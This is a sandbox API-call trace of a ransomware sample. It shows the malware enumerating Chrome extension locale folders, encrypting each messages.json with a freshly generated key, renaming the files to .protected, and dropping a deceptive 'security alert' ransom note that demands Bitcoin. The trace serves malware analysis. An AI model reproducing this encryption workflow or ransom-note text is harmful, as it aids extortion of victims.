pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.330] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.330] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.330] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.330] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.331] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.331] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.331] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.331] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0080.332] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.332] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0080.332] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.332] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.332] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.332] CloseHandle (hObject=0x168) returned 1 [0080.333] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.protected") returned 165 [0080.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.protected")) returned 1 [0080.333] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.333] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.334] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\RESTORE_FILES.txt") returned 159 [0080.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.334] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.334] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.335] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.335] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.335] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.335] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.335] CloseHandle (hObject=0x164) returned 1 [0080.335] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.335] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0080.335] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0080.335] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0080.336] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0080.336] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0080.336] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar") returned 141 [0080.336] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0080.336] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0080.336] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*") returned 143 [0080.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.338] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.338] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.338] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.339] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\.") returned 143 [0080.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.339] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\..") returned 144 [0080.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.339] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.339] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.339] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.340] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.340] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.340] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.340] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0080.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.341] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0080.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.341] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.342] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.342] CloseHandle (hObject=0x168) returned 1 [0080.342] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.protected") returned 165 [0080.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.protected")) returned 1 [0080.343] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.343] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.343] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0080.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.344] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.344] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.345] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.345] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.345] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.345] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.345] CloseHandle (hObject=0x164) returned 1 [0080.345] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.345] lstrcmpiW (lpString1="az", lpString2="Windows") returned -1 [0080.345] lstrcmpiW (lpString1="az", lpString2="Program Files") returned -1 [0080.345] lstrcmpiW (lpString1="az", lpString2="Program Files (x86)") returned -1 [0080.345] lstrcmpiW (lpString1="az", lpString2="$Recycle.bin") returned 1 [0080.345] lstrcmpiW (lpString1="az", lpString2="System Volume Information") returned -1 [0080.345] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az") returned 141 [0080.345] lstrcmpW (lpString1="az", lpString2=".") returned 1 [0080.345] lstrcmpW (lpString1="az", lpString2="..") returned 1 [0080.345] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*") returned 143 [0080.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.346] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.346] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.346] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.346] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.346] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\.") returned 143 [0080.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.346] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.346] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.346] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\..") returned 144 [0080.346] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.346] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.346] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 